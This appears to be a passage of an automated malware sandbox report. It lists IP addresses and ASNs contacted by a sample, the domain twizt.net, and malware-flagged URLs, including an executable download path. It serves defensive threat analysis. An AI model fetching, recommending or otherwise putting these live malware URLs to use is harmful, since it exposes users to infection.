12389 ROSTELECOM-ASRU false
105.109.202.176
 unknown Algeria
36947 ALGTEL-ASDZ false
185.215.113.66
 twizt.net Portugal
206894 WHOLESALECONNECTIONSNL false
134.35.185.171
 unknown Yemen
30873 PTC-YEMENNETYE false
213.230.90.222
 unknown Uzbekistan
8193 BRM-ASUZ false
5.251.56.144
 unknown Kazakhstan
9198 KAZTELECOM-ASKZ true
95.71.69.217
 unknown Russian Federation
12389 ROSTELECOM-ASRU true
89.218.235.182
 unknown Kazakhstan
9198 KAZTELECOM-ASKZ true
193.233.132.177
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU false
189.190.10.16
 unknown Mexico
8151 UninetSAdeCVMX false
36.20.68.95
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN true
37.20.161.137
 unknown Russian Federation
12389 ROSTELECOM-ASRU true
89.219.115.32
 unknown Iran (ISLAMIC Republic Of)
12880 DCI-ASIR true
84.53.244.106
 unknown Russian Federation
12389 ROSTELECOM-ASRU false
41.102.227.47
 unknown Algeria
36947 ALGTEL-ASDZ true
151.233.73.168
 unknown Iran (ISLAMIC Republic Of)
58224 TCIIR true
186.94.185.219
 unknown Venezuela
8048 CANTVServiciosVenezuelaVE true
2.185.146.181
 unknown Iran (ISLAMIC Republic Of)
58224 TCIIR true
95.58.18.206
 unknown Kazakhstan
9198 KAZTELECOM-ASKZ true
134.35.163.241
 unknown Yemen
30873 PTC-YEMENNETYE true
197.148.34.173
 unknown Angola
36907 TVCaboAngolaAO true
195.181.62.5
 unknown Iran (ISLAMIC Republic Of)
58224 TCIIR false
217.20.222.188
 unknown Syrian Arab Republic
29256 INT-PDN-STE-ASSTEPDNInternalASSY true
91.234.219.185
 unknown Uzbekistan
57764 IMAGETV-ASUZ true
109.122.77.179
 unknown Serbia
41937 RADIJUSVEKTOR-ASRS false
39.53.75.107
 unknown Pakistan
45595 PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPK true
31.186.54.5
 unknown Kyrgyzstan
12764 AKNET-ASKG true
92.47.124.54
 unknown Kazakhstan
9198 KAZTELECOM-ASKZ true
134.35.81.188
 unknown Yemen
30873 PTC-YEMENNETYE true
185.177.0.227
 unknown Tajikistan
51346 TOJIKTELECOM-ASRU false
2.191.221.216
 unknown Iran (ISLAMIC Republic Of)
12880 DCI-ASIR true
94.141.69.176
 unknown Uzbekistan
47452 IMAX-AS-UpstreamUztelecom-UZ false
2.180.157.70
 unknown Iran (ISLAMIC Republic Of)
58224 TCIIR true
151.233.21.215
 unknown Iran (ISLAMIC Republic Of)
58224 TCIIR false

Contacted Domains

Name IP Active
twizt.net 185.215.113.66 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.66/5 false
  • 18%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://185.215.113.66/4 false
  • 18%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://185.215.113.66/3 false
  • 18%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://185.215.113.66/2 false
  • 18%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://185.215.113.66/6 false
  • Avira URL Cloud: malware
 unknown
http://185.215.113.66/1 false
  • Avira URL Cloud: malware
 unknown
http://twizt.net/newtpp.exe false
  • Avira URL Cloud: malware
 unknown
http://twizt.net/peinstall.php false
  • Avira URL Cloud: malware
 unknown